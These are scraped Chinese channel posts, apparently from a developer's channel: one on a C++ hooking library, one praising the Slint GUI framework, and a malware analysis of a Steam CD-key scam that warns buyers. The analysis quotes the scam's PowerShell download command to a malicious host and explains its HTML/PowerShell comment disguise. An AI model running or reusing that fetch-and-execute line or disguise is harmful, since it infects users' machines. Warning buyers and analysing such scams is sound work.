b-star
bstar-0.5.7.js
呼呼 总算又发了一版
这段时间主要是在搓这个 blook,一个自己的 hook/hack/binary instrument 框架
为什么已经有这么多好的 Hook 框架了(比如 MinHook, Dobby, frida, subhook, detours.....)还要自己造轮子呢?其实还是对它们的 API 都不满意;个个都声称有 C++ 兼容,但是个个的 API 都长得像
同时,它们对逆向工程利用的周边建筑(infrastructure?)都不完善甚至没有,比如 xref, aob scan, CRT injection 等;对某些特殊需求(如需要在函数中间 hook)支持也无法令人满意;这些以前都是我手搓的,组合起来很别扭,一点都不优雅
于是出于解决这些种种问题的目的,我又造了个这个轮子。现在,B* 已经完全切换至该框架运行,足见其完备性。将来 chronocat-native/crychiccat 也会切换至该框架~
Fun Facts
在重构至 blook 后:
> 20 changed files with 385 additions and 2,177 deletions.
> 初始化时间加速了约 80%
> 非常方便地实现了 Failing gracefully
这段时间主要是在搓这个 blook,一个自己的 hook/hack/binary instrument 框架
为什么已经有这么多好的 Hook 框架了(比如 MinHook, Dobby, frida, subhook, detours.....)还要自己造轮子呢?其实还是对它们的 API 都不满意;个个都声称有 C++ 兼容,但是个个的 API 都长得像
hook(void* target, void* hook) 这种东西;用的时候东 cast 一下、西 cast 一下,南边还写一堆全局变量,也不支持 lambda 作为 hook 函数等...同时,它们对逆向工程利用的周边建筑(infrastructure?)都不完善甚至没有,比如 xref, aob scan, CRT injection 等;对某些特殊需求(如需要在函数中间 hook)支持也无法令人满意;这些以前都是我手搓的,组合起来很别扭,一点都不优雅
于是出于解决这些种种问题的目的,我又造了个这个轮子。现在,B* 已经完全切换至该框架运行,足见其完备性。将来 chronocat-native/crychiccat 也会切换至该框架~
Fun Facts
在重构至 blook 后:
> 20 changed files with 385 additions and 2,177 deletions.
> 初始化时间加速了约 80%
> 非常方便地实现了 Failing gracefully
GitHub
GitHub - std-microblock/blook: A modern C++ library for hacking.
A modern C++ library for hacking. Contribute to std-microblock/blook development by creating an account on GitHub.
🥰54👍7
b-star
bstar-0.5.7.js
这个安装器是用 slint-ui 实现的,也很有意思;目前对于原生的Rust GUI框架(编写模式),它是我最满意的。在很多小问题修复/新增之后,它可能会是(我心中)最优秀的 Rust gui 框架。
首先,他的业务逻辑和界面定义是分离的。界面定义由一个类似 Qt qml 的语言编写,并对于动画有原生的良好支持(Animated Property 等)。同时,它提供了不用提供示例数据的 Live Preview & Designer,这规避了 Rust 热重载支持差及重编译/增量编译速度慢的问题,使得良好的 UI 设计与快捷的开发速度兼备成为可能。另外,他的 std-widgets 提供了多种主题(fluent-ui, 苹果风, MDYou(他的mdyou现在还写得很烂))。
在我的浅浅体验下,对于异步网络请求,极大列表(虚拟化),多窗口等它都可以非常自然地胜任。甚至从 Counter 到 异步请求并返回 不需要多看一点 example 就可以自然而然地写出来。
群友如果有Rust人R批
虽然我一年前提的 10 个 issue 还只修了一两个
(不知道大家喜欢这种内容吗?)
首先,他的业务逻辑和界面定义是分离的。界面定义由一个类似 Qt qml 的语言编写,并对于动画有原生的良好支持(Animated Property 等)。同时,它提供了不用提供示例数据的 Live Preview & Designer,这规避了 Rust 热重载支持差及重编译/增量编译速度慢的问题,使得良好的 UI 设计与快捷的开发速度兼备成为可能。另外,他的 std-widgets 提供了多种主题(fluent-ui, 苹果风, MDYou(他的mdyou现在还写得很烂))。
在我的浅浅体验下,对于异步网络请求,极大列表(虚拟化),多窗口等它都可以非常自然地胜任。甚至从 Counter 到 异步请求并返回 不需要多看一点 example 就可以自然而然地写出来。
群友如果有Rust人
(不知道大家喜欢这种内容吗?)
slint.dev
Slint | Declarative GUI for Rust, C++, JavaScript & Python
Slint, the declarative GUI toolkit for Rust, C++, JavaScript, and Python. Build elegant, modern, stylish, native GUIs for Embedded, Desktop, and Web. Complete your UI design through quick iterations using Live Preview. Tweak everything, like colors, animations…
🥰32👍5
# 关于 steam.work 激活码诈骗脚本的分析
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
那么真实的代码就只剩一行了
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
<!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
💯59👍8